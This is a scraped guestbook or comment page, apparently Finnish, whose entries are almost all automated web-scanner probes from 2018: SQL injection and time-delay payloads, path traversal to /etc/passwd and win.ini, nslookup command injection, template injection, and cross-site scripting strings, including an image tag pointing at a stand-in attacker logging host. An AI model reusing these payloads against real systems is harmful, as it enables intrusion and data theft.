.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1

29.07.2018, 09:12

;print(md5(acunetix_wvs_security_test));

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

29.07.2018, 09:12

e

Nimi: e

JyI=

29.07.2018, 09:12

';print(md5(acunetix_wvs_security_test));$a='

Nimi: e

1

29.07.2018, 09:12

";print(md5(acunetix_wvs_security_test));$a="

Nimi: e

1

29.07.2018, 09:12

e

Nimi: 1'"

1

29.07.2018, 09:12

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

/www.vulnweb.com

29.07.2018, 09:12

e

Nimi: e

(select convert(int,CHAR(65)))

29.07.2018, 09:12

${@print(md5(acunetix_wvs_security_test))}

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

'"

29.07.2018, 09:12

${@print(md5(acunetix_wvs_security_test))}\

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

<!--

29.07.2018, 09:12

e

Nimi: \

1

29.07.2018, 09:12

e

Nimi: e

http://www.vulnweb.com

29.07.2018, 09:12

e

Nimi: e

//www.vulnweb.com

29.07.2018, 09:12

e

Nimi: '"

1

29.07.2018, 09:12

e

Nimi: e

/\www.vulnweb.com

29.07.2018, 09:12

e

Nimi: /www.vulnweb.com

1

29.07.2018, 09:12

e

Nimi: JyI=

1

29.07.2018, 09:12

Nimi: e

1

29.07.2018, 09:12

e

Nimi: (select convert(int,CHAR(65)))

1

29.07.2018, 09:12

e

Nimi: http://www.vulnweb.com

1

29.07.2018, 09:12

'"

Nimi: e

1

29.07.2018, 09:12

e

Nimi: //www.vulnweb.com

1

29.07.2018, 09:12

e

Nimi: /\www.vulnweb.com

1

29.07.2018, 09:12

1'"

Nimi: e

1

29.07.2018, 09:12

/www.vulnweb.com

Nimi: e

1

29.07.2018, 09:12

\

Nimi: e

1

29.07.2018, 09:12

//www.vulnweb.com

Nimi: e

1

29.07.2018, 09:12

http://www.vulnweb.com

Nimi: e

1

29.07.2018, 09:12

JyI=

Nimi: e

1

29.07.2018, 09:12

/\www.vulnweb.com

Nimi: e

1

29.07.2018, 09:12

(select convert(int,CHAR(65)))

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

<a HrEF=http://www.vulnweb.com></a>

29.07.2018, 09:12

e

Nimi: e

<a HrEF=jaVaScRiPT:>

29.07.2018, 09:12

e

Nimi: e

[url=http://www.vulnweb.com][/url]

29.07.2018, 09:13

-1 OR 3*2

Nimi: e

1

29.07.2018, 09:13

../../../../../../../../../../etc/passwd

Nimi: e

1

29.07.2018, 09:13

../../../../../../../../../../../../../../../proc/version

Nimi: e

1

29.07.2018, 09:13

-1' OR 3*2

Nimi: e

1

29.07.2018, 09:13

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Nimi: e

1

29.07.2018, 09:13

../../../../../../../../../../etc/passwd.jpg

Nimi: e

1

29.07.2018, 09:13

/../..//../..//../..//../..//../..//etc/passwd.jpg

Nimi: e

1

29.07.2018, 09:13

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Nimi: e

1

29.07.2018, 09:13

/etc/passwd

Nimi: e

1

29.07.2018, 09:13

%2fetc%2fpasswd

Nimi: e

1

29.07.2018, 09:13

/.././.././.././.././.././.././.././../etc/./passwd%00

Nimi: e

1

29.07.2018, 09:13

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

Nimi: e

1

29.07.2018, 09:13

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

Nimi: e

1

29.07.2018, 09:13

-1" OR 3*2

Nimi: e

1

29.07.2018, 09:13

1 waitfor delay '0:0:9' --

Nimi: e

1

29.07.2018, 09:13

file:///etc/passwd

Nimi: e

1

29.07.2018, 09:13

/\../\../\../\../\../\../\../etc/passwd

Nimi: e

1

29.07.2018, 09:13

WEB-INF/web.xml

Nimi: e

1

29.07.2018, 09:13

/WEB-INF/web.xml

Nimi: e

1

29.07.2018, 09:13

WEB-INF\web.xml

Nimi: e

1

29.07.2018, 09:13

../../../../../../../../../../windows/win.ini

Nimi: e

1

29.07.2018, 09:13

../../../../../../../../../../boot.ini

Nimi: e

1

29.07.2018, 09:13

../../../../../../../../../../windows/win.ini.jpg

Nimi: e

1

29.07.2018, 09:13

e

Nimi: [url=http://www.vulnweb.com][/url]

1

29.07.2018, 09:13

................windowswin.ini

Nimi: e

1

29.07.2018, 09:13

..\..\..\..\..\..\..\..\windows\win.ini

Nimi: e

1

29.07.2018, 09:13

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

Nimi: e

1

29.07.2018, 09:13

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

Nimi: e

1

29.07.2018, 09:13

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

Nimi: e

1

29.07.2018, 09:13

[url=http://www.vulnweb.com][/url]

Nimi: e

1

29.07.2018, 09:14

e

Nimi: e

'+response.write(9435344*9165496)+'

29.07.2018, 10:38

e

Nimi: e

response.write(9435344*9165496)

29.07.2018, 10:38

e

Nimi: e

"+response.write(9435344*9165496)+"

29.07.2018, 10:38

e

Nimi: e

-1 OR 2+66-66-1=0+0+0+1 --

29.07.2018, 10:38

e

Nimi: response.write(9688293*9124090)

1

29.07.2018, 10:38

e

Nimi: e

-1 OR 3+66-66-1=0+0+0+1 --

29.07.2018, 10:38

e

Nimi: '+response.write(9688293*9124090)+'

1

29.07.2018, 10:38

e

Nimi: "+response.write(9688293*9124090)+"

1

29.07.2018, 10:38

e

Nimi: e

-1 OR 3*2<(0+5+66-66) --

29.07.2018, 10:38

e

Nimi: e

-1 OR 3*2>(0+5+66-66) --

29.07.2018, 10:38

response.write(9720670*9883853)

Nimi: e

1

29.07.2018, 10:38

e

Nimi: e

-1 OR 2+991-991-1=0+0+0+1

29.07.2018, 10:38

'+response.write(9720670*9883853)+'

Nimi: e

1

29.07.2018, 10:38

e

Nimi: e

-1 OR 3+991-991-1=0+0+0+1

29.07.2018, 10:38

"+response.write(9720670*9883853)+"

Nimi: e

1

29.07.2018, 10:38

e

Nimi: e

-1 OR 3*2<(0+5+991-991)

29.07.2018, 10:38

e

Nimi: e

$(nslookup mIbHrKqH)

29.07.2018, 10:38

e

Nimi: e

&nslookup EqWGrzSB&'\"`0&nslookup EqWGrzSB&`'

29.07.2018, 10:38

e

Nimi: e

-1 OR 3*2>(0+5+991-991)

29.07.2018, 10:38

e

Nimi: $(nslookup c5Y05aOy)

1

29.07.2018, 10:38

e

Nimi: e

-1' OR 2+454-454-1=0+0+0+1 --

29.07.2018, 10:38

e

Nimi: &nslookup e2slIdwx&'\"`0&nslookup e2slIdwx&`'

1

29.07.2018, 10:38

e

Nimi: e

-1' OR 3+454-454-1=0+0+0+1 --

29.07.2018, 10:38

e

Nimi: e

-1' OR 3*2<(0+5+454-454) --

29.07.2018, 10:38

e

Nimi: e

-1' OR 3*2>(0+5+454-454) --

29.07.2018, 10:38

$(nslookup P6DEGrub)

Nimi: e

1

29.07.2018, 10:38

&nslookup D59tp9Mh&'\"`0&nslookup D59tp9Mh&`'

Nimi: e

1

29.07.2018, 10:38

e

Nimi: e

-1' OR 2+243-243-1=0+0+0+1 or 'AiGMqtvl'='

29.07.2018, 10:38

e

Nimi: e

EUV22yjA

29.07.2018, 10:38

e

Nimi: e

-1' OR 3+243-243-1=0+0+0+1 or 'AiGMqtvl'='

29.07.2018, 10:38

e

Nimi: ZV7qQYgW

1

29.07.2018, 10:38

e

Nimi: e

-1' OR 3*2<(0+5+243-243) or 'AiGMqtvl'='

29.07.2018, 10:38

vSDrDDic

Nimi: e

1

29.07.2018, 10:38

e

Nimi: e

-1' OR 3*2>(0+5+243-243) or 'AiGMqtvl'='

29.07.2018, 10:38

e

Nimi: e

-1" OR 2+111-111-1=0+0+0+1 --

29.07.2018, 10:38

e

Nimi: e

-1" OR 3+111-111-1=0+0+0+1 --

29.07.2018, 10:38

e

Nimi: e

${9999340+9999996}

29.07.2018, 10:38

e

Nimi: e

-1" OR 3*2<(0+5+111-111) --

29.07.2018, 10:38

e

Nimi: e

29.07.2018, 10:38

e

Nimi: ${9999085+9999590}

1

29.07.2018, 10:38

e

Nimi: e

-1" OR 3*2>(0+5+111-111) --

29.07.2018, 10:38

${9999679+9999539}

Nimi: e

1

29.07.2018, 10:38

e

Nimi: e

-1); waitfor delay '0:0:6' --

29.07.2018, 10:38

e

Nimi: e

1 waitfor delay '0:0:6' --

29.07.2018, 10:38

e

Nimi: e

wVLOJr76'; waitfor delay '0:0:6' --

29.07.2018, 10:38

e

Nimi: e

-1;select pg_sleep(6); --

29.07.2018, 10:38

e

Nimi: e

-1));select pg_sleep(9); --

29.07.2018, 10:38

e

Nimi: e

-1);select pg_sleep(9); --

29.07.2018, 10:38

e

Nimi: e

DTNNhaLw';select pg_sleep(9); --

29.07.2018, 10:38

e

Nimi: e

SyFUnUtw');select pg_sleep(9); --

29.07.2018, 10:38

Nimi: e

1

29.07.2018, 10:38

e

Nimi: e

pTC4P5yo'));select pg_sleep(9); --

29.07.2018, 10:38

e

Nimi: e

1&n932096=v909653

29.07.2018, 10:38

e

Nimi: e&n922865=v978552

1

29.07.2018, 10:38

e&n963644=v967088

Nimi: e

1

29.07.2018, 10:38

e

Nimi: -1 OR 2+101-101-1=0+0+0+1 --

1

29.07.2018, 10:38

e

Nimi: -1 OR 3+101-101-1=0+0+0+1 --

1

29.07.2018, 10:38

e

Nimi: -1 OR 3*2>(0+5+101-101) --

1

29.07.2018, 10:38

e

Nimi: e

29.07.2018, 10:38

e

Nimi: -1 OR 2+401-401-1=0+0+0+1

1

29.07.2018, 10:38

e

Nimi: -1 OR 3+401-401-1=0+0+0+1

1

29.07.2018, 10:38

e

Nimi: -1 OR 3*2>(0+5+401-401)

1

29.07.2018, 10:38

Nimi: e

1

29.07.2018, 10:38

e

Nimi: -1' OR 2+996-996-1=0+0+0+1 --

1

29.07.2018, 10:38

e

Nimi: -1' OR 3+996-996-1=0+0+0+1 --

1

29.07.2018, 10:38

e

Nimi: -1' OR 3*2>(0+5+996-996) --

1

29.07.2018, 10:38

e

Nimi: e

hyvinvointipalveluilla-on-monipolvisia-talousvaikutuksia.html

29.07.2018, 10:38

e

Nimi: -1' OR 2+28-28-1=0+0+0+1 or 'TrdHcuON'='

1

29.07.2018, 10:38

e

Nimi: hyvinvointipalveluilla-on-monipolvisia-talousvaikutuksia.html

1

29.07.2018, 10:38

e

Nimi: -1' OR 3+28-28-1=0+0+0+1 or 'TrdHcuON'='

1

29.07.2018, 10:38

e

Nimi: e

hyvinvointipalveluilla-on-monipolvisia-talousvaikutuksia.html/.

29.07.2018, 10:38

e

Nimi: hyvinvointipalveluilla-on-monipolvisia-talousvaikutuksia.html/.

1

29.07.2018, 10:38

e

Nimi: -1' OR 3*2>(0+5+28-28) or 'TrdHcuON'='

1

29.07.2018, 10:38

e

Nimi: -1" OR 2+619-619-1=0+0+0+1 --

1

29.07.2018, 10:38

hyvinvointipalveluilla-on-monipolvisia-talousvaikutuksia.html/.

Nimi: e

1

29.07.2018, 10:38

hyvinvointipalveluilla-on-monipolvisia-talousvaikutuksia.html

Nimi: e

1

29.07.2018, 10:38

e

Nimi: -1" OR 3+619-619-1=0+0+0+1 --

1

29.07.2018, 10:38

e

Nimi: http://hitKublN9TSCD.bxss.me/

1

29.07.2018, 10:38

e

Nimi: -1" OR 3*2>(0+5+619-619) --

1

29.07.2018, 10:38

e

Nimi: e

http://hitqAGlx09XVM.bxss.me/

29.07.2018, 10:38

e

Nimi: if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

29.07.2018, 10:38

e

Nimi: (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

29.07.2018, 10:38

e

Nimi: e

@@YxzhK

29.07.2018, 10:38

http://hitys99MjcRy7.bxss.me/

Nimi: e

1

29.07.2018, 10:38

e

Nimi: X6QESQnl';select pg_sleep(3); --

1

29.07.2018, 10:38

e

Nimi: lg5pJWqH'; waitfor delay '0:0:3' --

1

29.07.2018, 10:38

e

Nimi: jkv0bZWj');select pg_sleep(3); --

1

29.07.2018, 10:38

e

Nimi: Kz9cJ0Ou'));select pg_sleep(3); --

1

29.07.2018, 10:38

e

Nimi: e

969907

29.07.2018, 10:38

e

Nimi: @@7mjRC

1

29.07.2018, 10:38

e

Nimi: 955719

1

29.07.2018, 10:38

@@zTHyA

Nimi: e

1

29.07.2018, 10:38

939644

Nimi: e

1

29.07.2018, 10:38

e

Nimi: e

1'"()&%<acx><ScRiPt >K8sk(9501)</ScRiPt>

29.07.2018, 10:38

e

Nimi: e

1_9254

29.07.2018, 10:38

e

Nimi: e

'"()&%<acx><ScRiPt >K8sk(9535)</ScRiPt>

29.07.2018, 10:38

e

Nimi: e

acu5645<s1﹥s2ʺs3ʹuca5645

29.07.2018, 10:38

e

Nimi: e

1<ScRiPt >K8sk(9079)</ScRiPt>

29.07.2018, 10:38

e

Nimi: e

{{9999533*9999400}}

29.07.2018, 10:38

e

Nimi: e

1<WHYVBZ>EFAZG[!+!]</WHYVBZ>

29.07.2018, 10:39

e

Nimi: e

1<script>K8sk(9986)</script>

29.07.2018, 10:39

e

Nimi: e

1<ScR<ScRiPt>IpT>K8sk(9492)</sCr<ScRiPt>IpT>

29.07.2018, 10:39

e

Nimi: e

1<ScRiPt
>K8sk(9221)</ScRiPt>

29.07.2018, 10:39

e

Nimi: e

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9638></ScRiPt>

29.07.2018, 10:39

e

Nimi: e

1<video><source onerror="javascript:K8sk(9869)">

29.07.2018, 10:39

e

Nimi: e

1<isindex type=image src=1 onerror=K8sk(9997)>

29.07.2018, 10:39

e

Nimi: e

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9273'>

29.07.2018, 10:39

e

Nimi: e

1<img src=//testasp.vulnweb.com/t/dot.gif onload=K8sk(9404)>

29.07.2018, 10:39

e

Nimi: e

1<body onload=K8sk(9931)>

29.07.2018, 10:39

-1 OR 2+266-266-1=0+0+0+1 --

Nimi: e

1

29.07.2018, 10:39

e

Nimi: e

1<img src=xyz OnErRor=K8sk(9205)>

29.07.2018, 10:39

-1 OR 3+266-266-1=0+0+0+1 --

Nimi: e

1

29.07.2018, 10:39

e

Nimi: e

1<img/src=">" onerror=alert(9344)>

29.07.2018, 10:39

e

Nimi: e

%31%3C%53%63%52%69%50%74%20%3E%4B%38%73%6B%289887%29%3C%2F%73%43%72%69%70%54%3E

29.07.2018, 10:39

e

Nimi: e

1\u003CScRiPt\K8sk(9408)\u003C/sCripT\u003E

29.07.2018, 10:39

e

Nimi: e

1&lt;ScRiPt&gt;K8sk(9065)&lt;/sCripT&gt;

29.07.2018, 10:39

-1 OR 3*2>(0+5+266-266) --

Nimi: e

1

29.07.2018, 10:39

-1 OR 2+956-956-1=0+0+0+1

Nimi: e

1

29.07.2018, 10:39

e

Nimi: e

1<input autofocus onfocus=K8sk(9552)>

29.07.2018, 10:39

-1 OR 3+956-956-1=0+0+0+1

Nimi: e

1

29.07.2018, 10:39

e

Nimi: e

1}body{acu:Expre/**/SSion(K8sk(9695))}

29.07.2018, 10:39

-1 OR 3*2>(0+5+956-956)

Nimi: e

1

29.07.2018, 10:39

e

Nimi: e

1<img<!-- --> src=x onerror=alert(9552);//><!-- -->

29.07.2018, 10:39

e

Nimi: e

1<% contenteditable onresize=K8sk(9195)>

29.07.2018, 10:39

-1' OR 2+757-757-1=0+0+0+1 --

Nimi: e

1

29.07.2018, 10:39

e

Nimi: e

1_x94cP
<ScRiPt >K8sk(9979)</ScRiPt>

29.07.2018, 10:39

-1' OR 3+757-757-1=0+0+0+1 --

Nimi: e

1

29.07.2018, 10:39

e

Nimi: e

1<WS5L0J>OYQZG[!+!]</WS5L0J>

29.07.2018, 10:39

e

Nimi: e

1<ifRAme sRc=9583.com></IfRamE>

29.07.2018, 10:39

e

Nimi: e

1<tsNRxE x=9421>

29.07.2018, 10:39

e

Nimi: e'"()&%K8sk(9882)

1

29.07.2018, 10:39

-1' OR 3*2>(0+5+757-757) --

Nimi: e

1

29.07.2018, 10:39

e

Nimi: e

1<img sRc='http://attacker-9137/log.php?

29.07.2018, 10:39

e

Nimi: '"()&%K8sk(9782)

1

29.07.2018, 10:39

-1' OR 2+419-419-1=0+0+0+1 or 'DFAsyxLA'='

Nimi: e

1

29.07.2018, 10:39

-1' OR 3+419-419-1=0+0+0+1 or 'DFAsyxLA'='

Nimi: e

1

29.07.2018, 10:39

e

Nimi: e_9738

1

29.07.2018, 10:39

e

Nimi: acu1359<s1﹥s2ʺs3ʹuca1359

1

29.07.2018, 10:39

-1' OR 3*2>(0+5+419-419) or 'DFAsyxLA'='

Nimi: e

1

29.07.2018, 10:39

-1" OR 2+352-352-1=0+0+0+1 --

Nimi: e

1

29.07.2018, 10:39

e

Nimi: {{9999763*10000235}}

1

29.07.2018, 10:39

e

Nimi: eK8sk(9718)

1

29.07.2018, 10:39

-1" OR 3+352-352-1=0+0+0+1 --

Nimi: e

1

29.07.2018, 10:39

e

Nimi: e0XLK2[!+!]

1

29.07.2018, 10:39

-1" OR 3*2>(0+5+352-352) --

Nimi: e

1

29.07.2018, 10:39

e

Nimi: eK8sk(9673)

1

29.07.2018, 10:39

e

Nimi: eK8sk(9378)

1

29.07.2018, 10:39

e

Nimi: eK8sk(9980)

1

29.07.2018, 10:39

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

Nimi: e

1

29.07.2018, 10:39

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

Nimi: e

1

29.07.2018, 10:39

e

Nimi: eK8sk(9171)

1

29.07.2018, 10:39

ZsHr2iBd'; waitfor delay '0:0:9' --

Nimi: e

1

29.07.2018, 10:39

m4M5oFEv';select pg_sleep(9); --

Nimi: e

1

29.07.2018, 10:39

jGDq7yUl');select pg_sleep(3); --

Nimi: e

1

29.07.2018, 10:39

FRUNxFOH'));select pg_sleep(3); --

Nimi: e

1

29.07.2018, 10:39

e

Nimi: %65%3C%53%63%52%69%50%74%20%3E%4B%38%73%6B%289600%29%3C%2F%73%43%72%69%70%54%3E

1

29.07.2018, 10:39

e

Nimi: e\u003CScRiPt\K8sk(9579)\u003C/sCripT\u003E

1

29.07.2018, 10:39

e

Nimi: e&lt;ScRiPt&gt;K8sk(9538)&lt;/sCripT&gt;

1

29.07.2018, 10:39

e

Nimi: e}body{acu:Expre/**/SSion(K8sk(9518))}

1

29.07.2018, 10:39

e

Nimi: e_uoepK K8sk(9823)

1

29.07.2018, 10:39

e

Nimi: e2R9CC[!+!]

1

29.07.2018, 10:39

'"()&%K8sk(9724)

Nimi: e

1

29.07.2018, 10:39

e'"()&%K8sk(9716)

Nimi: e

1

29.07.2018, 10:39

e_9503

Nimi: e

1

29.07.2018, 10:39

acu9784<s1﹥s2ʺs3ʹuca9784

Nimi: e

1

29.07.2018, 10:39

{{9999378*9999035}}

Nimi: e

1

29.07.2018, 10:39

acu3547<s1﹥s2ʺs3ʹuca3547

Nimi: e

1

29.07.2018, 10:40

{{10000360*9999535}}

Nimi: e

1

29.07.2018, 10:40

e" onmouseover=K8sk(9144) bad="

Nimi: e

1

29.07.2018, 10:40

e" ZxHE=K8sk([!+!]) 8eW="

Nimi: e

1

29.07.2018, 10:40

%65%22%20%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%4B%38%73%6B%28%39%35%39%30%29%20%62%61%64%3D%22

Nimi: e

1

29.07.2018, 10:40

e\u0022 onmouseover=K8sk(9865) bad=\u0022

Nimi: e

1

29.07.2018, 10:40

e"sTYLe='acu:Expre/**/SSion(K8sk(9391))'bad="

Nimi: e

1

29.07.2018, 10:40

e">K8sk(9056)

Nimi: e

1

29.07.2018, 10:40

eK8sk(9715)

Nimi: e

1

29.07.2018, 10:40

eSHFTD[!+!]

Nimi: e

1

29.07.2018, 10:40

eK8sk(9956)

Nimi: e

1

29.07.2018, 10:40

eK8sk(9832)

Nimi: e

1

29.07.2018, 10:40

eK8sk(9311)

Nimi: e

1

29.07.2018, 10:40

eK8sk(9806)

Nimi: e

1

29.07.2018, 10:40

%65%3C%53%63%52%69%50%74%20%3E%4B%38%73%6B%289088%29%3C%2F%73%43%72%69%70%54%3E

Nimi: e

1

29.07.2018, 10:40

e\u003CScRiPt\K8sk(9309)\u003C/sCripT\u003E

Nimi: e

1

29.07.2018, 10:40

e&lt;ScRiPt&gt;K8sk(9283)&lt;/sCripT&gt;

Nimi: e

1

29.07.2018, 10:40

e}body{acu:Expre/**/SSion(K8sk(9440))}

Nimi: e

1

29.07.2018, 10:40

e_QCGEu K8sk(9981)

Nimi: e

1

29.07.2018, 10:40

e9KXMM[!+!]

Nimi: e

1

29.07.2018, 10:40

e

Nimi: 1acuG1x38q609Q

1

29.07.2018, 18:24

e

Nimi: e

1acuIH14rrwSpJ

29.07.2018, 18:24

1acuoUpo2eDBUr

Nimi: e

1

29.07.2018, 18:24

e

Nimi: e

1'"()&%<acx><ScRiPt >V7SM(9103)</ScRiPt>

29.07.2018, 18:51

e

Nimi: e

'"()&%<acx><ScRiPt >V7SM(9913)</ScRiPt>

29.07.2018, 18:51

e

Nimi: e

1_9119

29.07.2018, 18:51

e

Nimi: e

acu1796<s1﹥s2ʺs3ʹuca1796

29.07.2018, 18:51

e

Nimi: e

{{9999290*9999319}}

29.07.2018, 18:51

e

Nimi: e

1<ScRiPt >V7SM(9734)</ScRiPt>

29.07.2018, 18:51

e

Nimi: e

1<WTJCIX>APEXM[!+!]</WTJCIX>

29.07.2018, 18:51

e

Nimi: e

1<script>V7SM(9991)</script>

29.07.2018, 18:51

e

Nimi: e

1<ScR<ScRiPt>IpT>V7SM(9599)</sCr<ScRiPt>IpT>

29.07.2018, 18:51

e

Nimi: e

1<ScRiPt
>V7SM(9377)</ScRiPt>

29.07.2018, 18:51

e

Nimi: e

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9833></ScRiPt>

29.07.2018, 18:51

e

Nimi: e

1<video><source onerror="javascript:V7SM(9173)">

29.07.2018, 18:51

e

Nimi: e

1<isindex type=image src=1 onerror=V7SM(9782)>

29.07.2018, 18:52

e

Nimi: e

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9923'>

29.07.2018, 18:52

e

Nimi: e

1<body onload=V7SM(9710)>

29.07.2018, 18:52

e

Nimi: e

1<img src=//testasp.vulnweb.com/t/dot.gif onload=V7SM(9134)>

29.07.2018, 18:52

e

Nimi: e

1<img src=xyz OnErRor=V7SM(9346)>

29.07.2018, 18:52

e

Nimi: e

1<img/src=">" onerror=alert(9392)>

29.07.2018, 18:52

e

Nimi: e

%31%3C%53%63%52%69%50%74%20%3E%56%37%53%4D%289330%29%3C%2F%73%43%72%69%70%54%3E

29.07.2018, 18:52

e

Nimi: e

1\u003CScRiPt\V7SM(9762)\u003C/sCripT\u003E

29.07.2018, 18:52

e

Nimi: e

1&lt;ScRiPt&gt;V7SM(9880)&lt;/sCripT&gt;

29.07.2018, 18:52

e

Nimi: e

1<input autofocus onfocus=V7SM(9147)>

29.07.2018, 18:52

e

Nimi: e

1<img<!-- --> src=x onerror=alert(9876);//><!-- -->

29.07.2018, 18:52

e

Nimi: e

1}body{acu:Expre/**/SSion(V7SM(9632))}

29.07.2018, 18:52

e

Nimi: e

1<% contenteditable onresize=V7SM(9574)>

29.07.2018, 18:52

e

Nimi: e

1_eOqRF
<ScRiPt >V7SM(9456)</ScRiPt>

29.07.2018, 18:52

e

Nimi: e

1<WTH25I>VHJEK[!+!]</WTH25I>

29.07.2018, 18:52

e

Nimi: e

1<ifRAme sRc=9422.com></IfRamE>

29.07.2018, 18:52

e

Nimi: e

1<6tk0gV x=9759>

29.07.2018, 18:52

e

Nimi: e

1<img sRc='http://attacker-9084/log.php?

29.07.2018, 18:52

e

Nimi: e'"()&%V7SM(9971)

1

29.07.2018, 18:52

e

Nimi: '"()&%V7SM(9062)

1

29.07.2018, 18:52

e

Nimi: e_9781

1

29.07.2018, 18:52

e

Nimi: acu9055<s1﹥s2ʺs3ʹuca9055

1

29.07.2018, 18:52

e

Nimi: {{10000452*10000344}}

1

29.07.2018, 18:52

e

Nimi: eV7SM(9446)

1

29.07.2018, 18:52

e

Nimi: eRQTKR[!+!]

1

29.07.2018, 18:52

e

Nimi: eV7SM(9315)

1

29.07.2018, 18:52

e

Nimi: eV7SM(9123)

1

29.07.2018, 18:52

e

Nimi: eV7SM(9384)

1

29.07.2018, 18:53

e

Nimi: eV7SM(9653)

1

29.07.2018, 18:53

e

Nimi: %65%3C%53%63%52%69%50%74%20%3E%56%37%53%4D%289306%29%3C%2F%73%43%72%69%70%54%3E

1

29.07.2018, 18:53

e

Nimi: e\u003CScRiPt\V7SM(9057)\u003C/sCripT\u003E

1

29.07.2018, 18:53

e

Nimi: e&lt;ScRiPt&gt;V7SM(9069)&lt;/sCripT&gt;

1

29.07.2018, 18:53

e

